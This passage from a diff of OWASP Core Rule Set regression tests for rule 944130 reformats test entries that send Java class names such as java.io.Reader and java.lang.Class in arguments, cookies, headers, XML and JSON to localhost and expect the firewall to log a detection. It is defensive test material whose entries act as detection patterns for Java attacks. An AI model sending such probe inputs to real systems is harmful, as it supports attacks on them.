"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.Reader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 246 desc: "Cookie name includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.Reader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-247 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.Reader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 247 desc: "Request header test includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.Reader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-248 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.Reader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 248 desc: "XML attribute value includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-249 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 249 desc: "XML element value includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.Reader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-250 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.Reader" + output: + log_contains: "id \"944130\"" + - test_id: 250 desc: "Nested XML element value includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.Reader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-251 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.Reader" + output: + log_contains: "id \"944130\"" + - test_id: 251 desc: "Content-Type text/plain includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.Reader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-252 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.Reader" + output: + log_contains: "id \"944130\"" + - test_id: 252 desc: "Content-Type application/json arg value includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.Reader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-253 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.Reader\"}" + output: + log_contains: "id \"944130\"" + - test_id: 253 desc: "Content-Type application/json arg name includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.Reader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-254 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.Reader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 254 desc: "Argument test includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.StringReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-255 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.StringReader" + output: + log_contains: "id \"944130\"" + - test_id: 255 desc: "Argument name includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.StringReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-256 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.StringReader=test" + output: + log_contains: "id \"944130\"" + - test_id: 256 desc: "Cookie test includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.StringReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-257 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.StringReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 257 desc: "Cookie name includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.StringReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-258 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.StringReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 258 desc: "Request header test includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.StringReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-259 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.StringReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 259 desc: "XML attribute value includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-260 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 260 desc: "XML element value includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.StringReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-261 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.StringReader" + output: + log_contains: "id \"944130\"" + - test_id: 261 desc: "Nested XML element value includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.StringReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-262 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.StringReader" + output: + log_contains: "id \"944130\"" + - test_id: 262 desc: "Content-Type text/plain includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.StringReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-263 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.StringReader" + output: + log_contains: "id \"944130\"" + - test_id: 263 desc: "Content-Type application/json arg value includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.StringReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-264 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.StringReader\"}" + output: + log_contains: "id \"944130\"" + - test_id: 264 desc: "Content-Type application/json arg name includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.StringReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-265 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.StringReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 265 desc: "Argument test includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Class" - output: - log_contains: "id \"944130\"" - - test_title: 944130-266 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Class" + output: + log_contains: "id \"944130\"" + - test_id: 266 desc: "Argument name includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Class=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-267 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Class=test" + output: + log_contains: "id \"944130\"" + - test_id: 267 desc: "Cookie test includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.lang.Class - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-268 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Class + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 268 desc: "Cookie name includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.lang.Class=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-269 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Class=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 269 desc: "Request header test includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.lang.Class - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-270 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Class + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 270 desc: "XML attribute value includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-271 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 271 desc: "XML element value includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Class" - output: - log_contains: "id \"944130\"" - - test_title: 944130-272 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Class" + output: + log_contains: "id \"944130\"" + - test_id: 272 desc: "Nested XML element value includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.lang.Class" - output: - log_contains: "id \"944130\"" - - test_title: 944130-273 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.lang.Class" + output: + log_contains: "id \"944130\"" + - test_id: 273 desc: "Content-Type text/plain includes keyword java.lang.Class" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.lang.Class" - output: - log_contains: "id \"944130\"" - - test_title: 944130-274 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.lang.Class" + output: + log_contains: "id \"944130\"" + - test_id: 274 desc: "Content-Type 